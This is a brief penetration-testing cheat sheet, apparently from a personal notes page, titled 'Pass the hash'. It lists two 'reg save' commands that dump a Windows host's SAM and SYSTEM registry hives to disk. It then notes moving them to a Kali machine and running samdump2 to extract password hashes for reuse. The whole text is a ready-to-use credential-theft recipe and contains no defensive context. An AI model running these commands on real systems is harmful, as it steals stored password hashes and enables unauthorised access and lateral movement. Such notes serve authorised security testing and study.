Pass the hash

reg save HKLM\SAM c:\SAM 
reg save HKLM\System c:\System

---transfer both to kali machine---

samdump2 System SAM

Last updated